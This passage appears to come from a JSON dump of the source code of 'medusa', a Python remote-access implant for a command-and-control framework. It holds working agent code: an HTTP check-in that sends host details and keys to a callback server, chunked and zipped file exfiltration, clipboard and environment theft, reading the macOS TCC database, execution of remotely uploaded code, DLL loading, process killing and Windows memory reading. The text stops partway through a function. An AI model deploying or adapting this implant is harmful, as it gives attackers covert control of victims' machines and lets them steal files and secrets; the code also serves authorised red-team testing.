\"callback_port\",\n            \"PostURI\": \"/post_uri\",\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": callback_interval,\n            \"Jitter\": callback_jitter,\n            \"GetURI\": \"/get_uri\",\n            \"GetParam\": \"query_path_name\",\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py3",
    "content": "### IMPORTS ###\nimport urllib.request\n\n### CLASS_FIELDS ###\n\n### FUNCTIONS ###\n    def postMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST')))\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True))))\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = 
urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n        #CERTSKIP\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib.request.HTTPSHandler if tls == \"https\" else urllib.request.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                        self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib.request.HTTPBasicAuthHandler()\n                opener = urllib.request.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib.request.build_opener(proxy, handler)\n            urllib.request.install_opener(opener)\n        try:\n            with urllib.request.urlopen(req) as response:\n                out = base64.b64decode(response.read())\n                response.close()\n                return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Server\": \"callback_host\",\n            \"Port\": \"callback_port\",\n            \"PostURI\": \"/post_uri\",\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": callback_interval,\n            \"Jitter\": callback_jitter,\n            \"GetURI\": \"/get_uri\",\n            \"GetParam\": \"query_path_name\",\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cat.py",
    "content": "    def cat(self, task_id, path):\n        file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n        \n        with open(file_path, 'r') as f:\n            content = f.readlines()\n            return ''.join(content)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cd.py",
    "content": "    def cd(self, task_id, path):\n        if path == \"..\":\n            self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep))\n        else:\n            self.current_directory = path if path[0] == os.sep \\\n                else os.path.abspath(os.path.join(self.current_directory,path))\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/clipboard.py2",
    "content": "    def clipboard(self, task_id):\n        from Cocoa import NSPasteboard, NSStringPboardType\n        pboard = NSPasteboard.generalPasteboard()\n        pString = pboard.stringForType_(NSStringPboardType)\n        return str(pString).encode('utf8')\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cp.py",
    "content": "    def cp(self, task_id, source, destination):\n        import shutil\n\n        source_path = source if source[0] == os.sep \\\n                else os.path.join(self.current_directory,source)\n\n        dest_path = destination if destination[0] == os.sep \\\n                else os.path.join(self.current_directory,destination)\n\n        if os.path.isdir(source_path):\n            shutil.copytree(source_path, dest_path)\n        else:\n            shutil.copy(source_path, dest_path)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/cwd.py",
    "content": "    def cwd(self, task_id):\n        return self.current_directory\n        "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/download.py",
    "content": "    def download(self, task_id, file):\n        file_path = file if file[0] == os.sep \\\n                else os.path.join(self.current_directory,file)\n\n        file_size = os.stat(file_path).st_size \n        total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n        data = {\n            \"action\": \"post_response\", \n            \"responses\": [{\n                \"task_id\": task_id,\n                \"download\": {\n                    \"total_chunks\": total_chunks,\n                    \"full_path\": file_path,\n                    \"chunk_size\": CHUNK_SIZE\n                }\n            }]\n        }\n        initial_response = self.postMessageAndRetrieveResponse(data)\n        file_id = initial_response[\"responses\"][0][\"file_id\"]\n        chunk_num = 1\n        with open(file_path, 'rb') as f:\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                content = f.read(CHUNK_SIZE)\n                if not content:\n                    break # done\n\n                data = {\n                    \"action\": \"post_response\", \n                    \"responses\": [\n                        {\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"chunk_num\": chunk_num,\n                                \"file_id\": file_id,\n                                \"chunk_data\": base64.b64encode(content).decode()\n                            }\n                        }\n                    ]\n                }\n                chunk_num+=1\n                response = self.postMessageAndRetrieveResponse(data)\n        return json.dumps({\n            \"agent_file_id\": file_id\n        })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/download_bulk.py",
    "content": "    def download_bulk(self, task_id, path, mode=\"archive\"):\n            \"\"\"\n            Bulk download files or a directory from the target machine.\n\n            Args:\n                task_id: The task identifier for this operation.\n                path: A file path, directory path, or JSON list of file paths (absolute paths).\n                mode: \"iterative\" to send files one by one, or \"archive\" to bundle into\n                      an in-memory zip and send as a single file (default: \"archive\").\n            \"\"\"\n            import zipfile\n            import io\n\n            # Resolve the list of files to download.\n            # archive_base_dir is used in archive mode to compute relative arcnames that\n            # preserve the original directory structure inside the zip.\n            file_list = []\n            archive_base_dir = None\n\n            # Check if path is a list of files/directories\n            if isinstance(path, list):\n                for p in path:\n                    abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)\n                    if os.path.isdir(abs_p):\n                        for root, dirs, files in os.walk(abs_p):\n                            for fname in files:\n                                file_list.append(os.path.join(root, fname))\n                    else:\n                        file_list.append(abs_p)\n                # Anchor arcnames at the filesystem root so each entry's full path is\n                # preserved inside the archive (e.g. 
\"etc/nginx/nginx.conf\").\n                archive_base_dir = os.sep\n            elif isinstance(path, str):\n                # Try to parse a JSON list from a string (backward compat)\n                stripped = path.strip()\n                if stripped.startswith(\"[\"):\n                    try:\n                        parsed = json.loads(stripped)\n                        if isinstance(parsed, list):\n                            for f in parsed:\n                                abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)\n                                if os.path.isdir(abs_f):\n                                    for root, dirs, files in os.walk(abs_f):\n                                        for fname in files:\n                                            file_list.append(os.path.join(root, fname))\n                                else:\n                                    file_list.append(abs_f)\n                            archive_base_dir = os.sep\n                        else:\n                            return \"Invalid path value: {}\".format(path)\n                    except Exception as e:\n                        return \"Failed to parse path as JSON list: {} - {}\".format(path, e)\n                else:\n                    # Normalise to absolute path\n                    abs_path = path if os.path.isabs(path) \\\n                        else os.path.join(self.current_directory, path)\n\n                    if os.path.isdir(abs_path):\n                        archive_base_dir = os.path.dirname(abs_path)\n                        for root, dirs, files in os.walk(abs_path):\n                            for fname in files:\n                                file_list.append(os.path.join(root, fname))\n                    elif os.path.isfile(abs_path):\n                        archive_base_dir = os.path.dirname(abs_path)\n                        file_list = [abs_path]\n                    else:\n                        
return \"Path does not exist or is not accessible: {}\".format(abs_path)\n            else:\n                return \"Invalid path argument type: {}\".format(type(path))\n\n            if not file_list:\n                return \"No files found to download.\"\n\n            # Cache the task reference once to avoid repeated O(n) lookups inside loops\n            task_ref = [task for task in self.taskings if task[\"task_id\"] == task_id][0]\n\n            results = []\n\n            if mode == \"iterative\":\n                # Download each file individually using the same chunked approach as download()\n                for file_path in file_list:\n                    if task_ref[\"stopped\"]:\n                        return \"Job stopped.\"\n\n                    if not os.path.isfile(file_path):\n                        results.append(\"Skipped (not a file): {}\".format(file_path))\n                        continue\n\n                    file_size = os.stat(file_path).st_size\n                    total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)\n\n                    data = {\n                        \"action\": \"post_response\",\n                        \"responses\": [{\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"total_chunks\": total_chunks,\n                                \"full_path\": file_path,\n                                \"chunk_size\": CHUNK_SIZE\n                            }\n                        }]\n                    }\n                    initial_response = self.postMessageAndRetrieveResponse(data)\n                    file_id = initial_response[\"responses\"][0][\"file_id\"]\n                    chunk_num = 1\n\n                    with open(file_path, 'rb') as f:\n                        while True:\n                            if task_ref[\"stopped\"]:\n                                return \"Job stopped.\"\n\n                  
          content = f.read(CHUNK_SIZE)\n                            if not content:\n                                break\n\n                            data = {\n                                \"action\": \"post_response\",\n                                \"responses\": [{\n                                    \"task_id\": task_id,\n                                    \"download\": {\n                                        \"chunk_num\": chunk_num,\n                                        \"file_id\": file_id,\n                                        \"chunk_data\": base64.b64encode(content).decode()\n                                    }\n                                }]\n                            }\n                            chunk_num += 1\n                            self.postMessageAndRetrieveResponse(data)\n\n                    results.append(json.dumps({\"agent_file_id\": file_id, \"file_path\": file_path}))\n\n                return \"\\n\".join(results)\n\n            else:\n                # Archive mode: build an in-memory zip and send it as a single file.\n                # Directory structure is preserved inside the archive using arcnames\n                # computed relative to archive_base_dir.\n                zip_buffer = io.BytesIO()\n                with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:\n                    for file_path in file_list:\n                        if task_ref[\"stopped\"]:\n                            return \"Job stopped.\"\n\n                        if not os.path.isfile(file_path):\n                            continue\n\n                        # Preserve the original directory structure: compute the path\n                        # relative to archive_base_dir so that sub-directories appear as\n                        # real zip entries (e.g. 
nginx/conf.d/default.conf) rather than\n                        # flat names with underscores.\n                        arcname = os.path.relpath(file_path, archive_base_dir)\n                        zf.write(file_path, arcname)\n\n                zip_data = zip_buffer.getvalue()\n                zip_buffer.close()\n\n                archive_name = \"download_bulk_{}.zip\".format(task_id)\n                total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)\n\n                data = {\n                    \"action\": \"post_response\",\n                    \"responses\": [{\n                        \"task_id\": task_id,\n                        \"download\": {\n                            \"total_chunks\": total_chunks,\n                            \"full_path\": archive_name,\n                            \"chunk_size\": CHUNK_SIZE\n                        }\n                    }]\n                }\n                initial_response = self.postMessageAndRetrieveResponse(data)\n                file_id = initial_response[\"responses\"][0][\"file_id\"]\n                chunk_num = 1\n                offset = 0\n\n                while offset < len(zip_data):\n                    if task_ref[\"stopped\"]:\n                        return \"Job stopped.\"\n\n                    chunk = zip_data[offset:offset + CHUNK_SIZE]\n                    data = {\n                        \"action\": \"post_response\",\n                        \"responses\": [{\n                            \"task_id\": task_id,\n                            \"download\": {\n                                \"chunk_num\": chunk_num,\n                                \"file_id\": file_id,\n                                \"chunk_data\": base64.b64encode(chunk).decode()\n                            }\n                        }]\n                    }\n                    chunk_num += 1\n                    offset += CHUNK_SIZE\n                    
self.postMessageAndRetrieveResponse(data)\n\n                return json.dumps({\"agent_file_id\": file_id})\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/env.py",
    "content": "    def env(self, task_id):\n        return \"\\n\".join([\"{}: {}\".format(x, os.environ[x]) for x in os.environ])\n "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/eval_code.py",
    "content": "    def eval_code(self, task_id, command):\n        return eval(command)\n        "
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/exit.py",
    "content": "    def exit(self, task_id):\n        os._exit(0)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/jobkill.py",
    "content": "    def jobkill(self, task_id, target_task_id):\n        task = [task for task in self.taskings if task[\"task_id\"] == target_task_id]\n        task[0][\"stopped\"] = True\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/jobs.py",
    "content": "    def jobs(self, task_id):\n        out = [t.name.split(\":\") for t in threading.enumerate() \\\n            if t.name != \"MainThread\" and \"a2m\" not in t.name \\\n            and \"m2a\" not in t.name and t.name != \"jobs:{}\".format(task_id) ]\n        if len(out) > 0: return json.dumps({ \"jobs\": out })\n        else: return \"No long running jobs!\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/kill.py3",
    "content": "    def kill(self, task_id, process_id):\n        import ctypes, ctypes.wintypes\n        from ctypes import GetLastError\n\n        NTSTATUS = ctypes.wintypes.LONG\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n        \n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n        TerminateProcess = Kernel32.TerminateProcess\n        TerminateProcess.restype = ctypes.wintypes.BOOL\n\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n        \n        try:\n            hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id)\n            if hProcess:\n                TerminateProcess(hProcess, 1)\n                CloseHandle(hProcess)    \n        except Exception as e:\n            return e\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_apps.py2",
    "content": "    def list_apps(self, task_id):\n        import Cocoa\n        app_json = []\n        apps = Cocoa.NSWorkspace.sharedWorkspace().runningApplications()\n        for app in apps:\n            try:\n                app_data = { \"pid\": str(app.processIdentifier()), \"name\": str(app.localizedName()), \"exec_url\": str(app.executableURL()) }\n                app_json.append(app_data)\n            except: pass\n        return json.dumps({ \"apps\": app_json })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_dlls.py3",
    "content": "    def list_dlls(self, task_id, process_id=0):\n        import sys, os.path, ctypes, ctypes.wintypes\n        from ctypes import create_unicode_buffer, GetLastError\n        import re\n        import datetime\n\n        def _check_bool(result, func, args):\n            if not result:\n                raise ctypes.WinError(ctypes.get_last_error())\n            return args\n\n        PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)\n        ULONG_PTR = ctypes.wintypes.LPVOID\n        SIZE_T = ctypes.c_size_t\n        NTSTATUS = ctypes.wintypes.LONG\n        PVOID = ctypes.wintypes.LPVOID\n        PROCESSINFOCLASS = ctypes.wintypes.ULONG\n\n        Kernel32 = ctypes.WinDLL('kernel32.dll')\n        OpenProcess = Kernel32.OpenProcess\n        OpenProcess.restype = ctypes.wintypes.HANDLE\n        CloseHandle = Kernel32.CloseHandle\n        CloseHandle.errcheck = _check_bool\n\n        GetCurrentProcess = Kernel32.GetCurrentProcess\n        GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n        GetCurrentProcess.argtypes = ()\n\n        ReadProcessMemory = Kernel32.ReadProcessMemory\n        ReadProcessMemory.errcheck = _check_bool\n        ReadProcessMemory.argtypes = (\n            ctypes.wintypes.HANDLE,\n            ctypes.wintypes.LPCVOID,\n            ctypes.wintypes.LPVOID, \n            SIZE_T,\n            ctypes.POINTER(SIZE_T)) \n\n        # WINAPI Definitions\n        PROCESS_VM_READ           = 0x0010\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ERROR_INVALID_HANDLE = 0x0006\n        ERROR_PARTIAL_COPY   = 0x012B\n\n        WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7\n\n        MAX_PATH = 260\n        PROCESS_TERMINATE = 0x0001\n        PROCESS_QUERY_INFORMATION = 0x0400\n\n        ProcessBasicInformation   = 0\n        ProcessDebugPort          = 7\n        ProcessWow64Information   = 26\n        ProcessImageFileName      = 27\n        ProcessBreakOnTermination = 29\n\n        STATUS_UNSUCCESSFUL         = NTSTATUS(0xC0000001)\n  
      STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value\n        STATUS_INVALID_HANDLE       = NTSTATUS(0xC0000008).value\n        STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value\n\n\n        class RemotePointer(ctypes._Pointer):\n            def __getitem__(self, key):\n                # TODO: slicing\n                size = None\n                if not isinstance(key, tuple):\n                    raise KeyError('must be (index, handle[, size])')\n                if len(key) > 2:\n                    index, handle, size = key\n                else:\n                    index, handle = key\n                if isinstance(index, slice):\n                    raise TypeError('slicing is not supported')\n                dtype = self._type_\n                offset = ctypes.sizeof(dtype) * index\n                address = PVOID.from_buffer(self).value + offset\n                simple = issubclass(dtype, ctypes._SimpleCData)\n                if simple and size is not None:\n                    if dtype._type_ == ctypes.wintypes.WCHAR._type_:\n                        buf = (ctypes.wintypes.WCHAR * (size // 2))()\n                    else:\n                        buf = (ctypes.c_char * size)()\n                else:\n                    buf = dtype()\n                nread = SIZE_T()\n                Kernel32.ReadProcessMemory(handle,\n                                        address,\n                                        ctypes.byref(buf),\n                                        ctypes.sizeof(buf),\n                                        ctypes.byref(nread))\n                if simple:\n                    return buf.value\n                return buf\n\n        _remote_pointer_cache = {}\n        def RPOINTER(dtype):\n            if dtype in _remote_pointer_cache:\n                return _remote_pointer_cache[dtype]\n            name = 'RP_%s' % dtype.__name__\n            ptype = type(name, (RemotePointer,), {'_type_': dtype})\n            
_remote_pointer_cache[dtype] = ptype\n            return ptype\n\n\n        RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)\n\n        class UNICODE_STRING(ctypes.Structure):\n            _fields_ = (('Length',        ctypes.wintypes.USHORT),\n                        ('MaximumLength', ctypes.wintypes.USHORT),\n                        ('Buffer',        RPWSTR))\n\n        class LIST_ENTRY(ctypes.Structure):\n            pass\n\n        RPLIST_ENTRY = RPOINTER(LIST_ENTRY)\n\n        LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),\n                            ('Blink', RPLIST_ENTRY))\n\n        class LDR_DATA_TABLE_ENTRY(ctypes.Structure):\n            _fields_ = (('Reserved1',          PVOID * 2),\n                        ('InMemoryOrderLinks', LIST_ENTRY),\n                        ('Reserved2',          PVOID * 2),\n                        ('DllBase',            PVOID),\n                        ('EntryPoint',         PVOID),\n                        ('Reserved3',          PVOID),\n                        ('FullDllName',        UNICODE_STRING),\n                        ('Reserved4',          ctypes.wintypes.BYTE * 8),\n                        ('Reserved5',          PVOID * 3),\n                        ('CheckSum',           PVOID),\n                        ('TimeDateStamp',      ctypes.wintypes.ULONG))\n\n        RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY)\n\n        class PEB_LDR_DATA(ctypes.Structure):\n            _fields_ = (('Reserved1',               ctypes.wintypes.BYTE * 8),\n                        ('Reserved2',               PVOID * 3),\n                        ('InMemoryOrderModuleList', LIST_ENTRY))\n\n        RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)\n\n        class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):\n            _fields_ = (('Reserved1',     ctypes.wintypes.BYTE * 16),\n                        ('Reserved2',     PVOID * 10),\n                        ('ImagePathName', UNICODE_STRING),\n                        ('CommandLine',   
UNICODE_STRING))\n\n        RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)\n        PPS_POST_PROCESS_INIT_ROUTINE = PVOID\n\n        class PEB(ctypes.Structure):\n            _fields_ = (('Reserved1',              ctypes.wintypes.BYTE * 2),\n                        ('BeingDebugged',          ctypes.wintypes.BYTE),\n                        ('Reserved2',              ctypes.wintypes.BYTE * 1),\n                        ('Reserved3',              PVOID * 2),\n                        ('Ldr',                    RPPEB_LDR_DATA),\n                        ('ProcessParameters',      RPRTL_USER_PROCESS_PARAMETERS),\n                        ('Reserved4',              ctypes.wintypes.BYTE * 104),\n                        ('Reserved5',              PVOID * 52),\n                        ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),\n                        ('Reserved6',              ctypes.wintypes.BYTE * 128),\n                        ('Reserved7',              PVOID * 1),\n                        ('SessionId',              ctypes.wintypes.ULONG))\n\n        RPPEB = RPOINTER(PEB)\n\n        class PROCESS_BASIC_INFORMATION(ctypes.Structure):\n            _fields_ = (('Reserved1',       PVOID),\n                        ('PebBaseAddress',  RPPEB),\n                        ('Reserved2',       PVOID * 2),\n                        ('UniqueProcessId', ULONG_PTR),\n                        ('InheritedFromUniqueProcessId',       ULONG_PTR))\n\n        def NtError(status):\n            import sys\n            descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)\n            if status & 0xC0000000 == 0xC0000000:\n                descr += '[Error]'\n            elif status & 0x80000000 == 0x80000000:\n                descr += '[Warning]'\n            elif status & 0x40000000 == 0x40000000:\n                descr += '[Information]'\n            else:\n                descr += '[Success]'\n            if sys.version_info[:2] < (3, 3):\n                return 
WindowsError(status, descr)\n            return OSError(None, descr, None, status)\n\n        ntdll = ctypes.WinDLL('ntdll.dll')\n        NtQueryInformationProcess = ntdll.NtQueryInformationProcess\n        NtQueryInformationProcess.restype = NTSTATUS\n        NtQueryInformationProcess.argtypes = (\n            ctypes.wintypes.HANDLE,\n            PROCESSINFOCLASS, \n            PVOID,            \n            ctypes.wintypes.ULONG, \n            PULONG)           \n\n        class ProcessInformation(object):\n            _close_handle = False\n            _closed = False\n            _module_names = None\n\n            def __init__(self, process_id=None, handle=None):\n                if process_id is None and handle is None:\n                    handle = GetCurrentProcess()\n                elif handle is None:\n                    handle = OpenProcess(PROCESS_VM_READ | \n                                            PROCESS_QUERY_INFORMATION,\n                                                False, process_id)\n                    self._close_handle = True\n                self._handle = handle\n                self._query_info()\n                if process_id is not None and not self._ldr:\n                    return\n\n            def __del__(self, CloseHandle=CloseHandle):\n                if self._close_handle and not self._closed:\n                    try:\n                        CloseHandle(self._handle)\n                    except WindowsError as e:\n                        pass\n                    self._closed = True\n\n            def _query_info(self):\n                info = PROCESS_BASIC_INFORMATION()\n                handle = self._handle\n                status = NtQueryInformationProcess(handle,\n                                                ProcessBasicInformation,\n                                                ctypes.byref(info),\n                                                ctypes.sizeof(info),\n                                            
    None)\n                if status < 0:\n                    raise NtError(status)\n\n                self._peb = peb = info.PebBaseAddress[0, handle]\n                self._ldr = peb.Ldr[0, handle]\n\n            def _modules_iter(self):\n                headaddr = (PVOID.from_buffer(self._peb.Ldr).value +\n                            PEB_LDR_DATA.InMemoryOrderModuleList.offset)\n                offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset\n                pentry = self._ldr.InMemoryOrderModuleList.Flink\n                while pentry:\n                    pentry_void = PVOID.from_buffer_copy(pentry)\n                    if pentry_void.value == headaddr:\n                        break\n                    pentry_void.value -= offset\n                    pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void)\n                    mod = pmod[0, self._handle]\n                    yield mod\n                    pentry = LIST_ENTRY.from_buffer(mod, offset).Flink\n\n            def update_module_names(self):\n                names = []\n                for m in self._modules_iter():\n                    ustr = m.FullDllName\n                    name = ustr.Buffer[0, self._handle, ustr.Length]\n                    names.append(name)\n                self._module_names = names\n\n            @property\n            def module_names(self):\n                if self._module_names is None:\n                    self.update_module_names()\n                return self._module_names\n\n        try:\n            if not process_id:\n                pi = ProcessInformation()\n            else:\n                pi = ProcessInformation(process_id)\n            return json.dumps({ \"dlls\": pi.module_names })\n        except Exception as e:\n            return e"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_modules.py",
    "content": "    def list_modules(self, task_id, module_name=\"\"):\n        if module_name:\n            if module_name in self.moduleRepo.keys():\n                return \"\\n\".join(self.moduleRepo[module_name].namelist())\n            else: return \"{} not found in loaded modules\".format(module_name)\n        else:\n            return \"\\n\".join(self.moduleRepo.keys())\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/list_tcc.py",
    "content": "    def list_tcc(self,task_id,tcc=True, db=\"/Library/Application Support/com.apple.TCC/TCC.db\"):\n        import sqlite3\n\n        with sqlite3.connect(db) as con:\n            columns = []\n            for row in con.execute('PRAGMA table_info(\"access\")'):\n                columns.append(row)\n\n            tcc = []\n            for row in con.execute('SELECT * FROM \"access\"'):\n                tcc.append(row)\n            results = []\n            for entry in tcc:\n                line={}\n                count = 0 \n                for ent in entry:\n                    if columns[count][2] == \"BLOB\" and ent != None:\n                        line[columns[count][1]] = base64.b64encode(ent).decode()\n                    else: line[columns[count][1]] = str(ent)\n                    count+=1\n                results.append(line)\n\n            tcc_results = {}\n            tcc_results[\"entries\"] = results\n            return json.dumps({ \"tcc\": results })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load.py",
    "content": "    def load(self, task_id, file_id, command):\n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file_id, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n\n        if cmd_code:\n            exec(cmd_code.replace(\"\\n    \",\"\\n\")[4:])\n            setattr(medusa, command, eval(command))\n            cmd_list = [{\"action\": \"add\", \"cmd\": command}]\n            responses = [{ \"task_id\": task_id, \"user_output\": \"Loaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n            message = { \"action\": \"post_response\", \"responses\": responses }\n            response_data = self.postMessageAndRetrieveResponse(message)\n        else: return \"Failed to upload '{}' command\".format(command)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_dll.py",
    "content": "    def load_dll(self, task_id, dllpath, dllexport):\n        from ctypes import WinDLL\n        dll_file_path = dllpath if dllpath[0] == os.sep \\\n                else os.path.join(self.current_directory,dllpath)\n        loaded_dll = WinDLL(dll_file_path)\n        getattr(loaded_dll, dllexport)()\n        return \"[*] {} Loaded.\".format(dllpath)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/load_module.py2",
    "content": "    def load_module(self, task_id, file, module_name):\n        import zipfile, io\n        class CFinder(object):\n            def __init__(self, repoName, instance):\n                self.moduleRepo = instance.moduleRepo\n                self.repoName = repoName\n                self._source_cache = {}\n\n            def _get_info(self, repoName, fullname):\n                parts = fullname.split('.')\n                submodule = parts[-1]\n                modulepath = '/'.join(parts)\n                _search_order = [('.py', False), ('/__init__.py', True)]\n                for suffix, is_package in _search_order:\n                    relpath = modulepath + suffix\n                    try: self.moduleRepo[repoName].getinfo(relpath)\n                    except KeyError: pass\n                    else: return submodule, is_package, relpath\n                msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))\n                raise ImportError(msg)\n\n            def _get_source(self, repoName, fullname):\n                submodule, is_package, relpath = self._get_info(repoName, fullname)\n                fullpath = '%s/%s' % (repoName, relpath)\n                if relpath in self._source_cache:\n                    source = self._source_cache[relpath]\n                    return submodule, is_package, fullpath, source\n                try:\n                    source =  self.moduleRepo[repoName].read(relpath)\n                    source = source.replace(b'\\r\\n', b'\\n')\n                    source = source.replace(b'\\r', b'\\n')\n                    self._source_cache[relpath] = source\n                    return submodule, is_package, fullpath, source\n                except: raise ImportError(\"Unable to obtain source for module %s\" % (fullpath))\n\n            def find_module(self, fullname, path=None):\n                try: submodule, is_package, relpath = self._get_info(self.repoName, fullname)\n                except 
ImportError: return None\n                else: return self\n\n            def load_module(self, fullname):\n                import imp\n                submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)\n                code = compile(source, fullpath, 'exec')\n                mod = sys.modules.setdefault(fullname, imp.new_module(fullname))\n                mod.__loader__ = self\n                mod.__file__ = fullpath\n                mod.__name__ = fullname\n                if is_package: mod.__path__ = [os.path.dirname(mod.__file__)]\n                exec code in mod.__dict__\n                return mod\n\n            def get_data(self, fullpath):\n                prefix = os.path.join(self.repoName, '')\n                if not fullpath.startswith(prefix):\n                    raise IOError('Path %r does not start with module name %r', (fullpath, prefix))\n                relpath = fullpath[len(prefix):]\n                try: return self.moduleRepo[self.repoName].read(relpath)\n                except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))\n\n            def is_package(self, fullname):\n                \"\"\"Return if the module is a package\"\"\"\n                submodule, is_package, relpath = 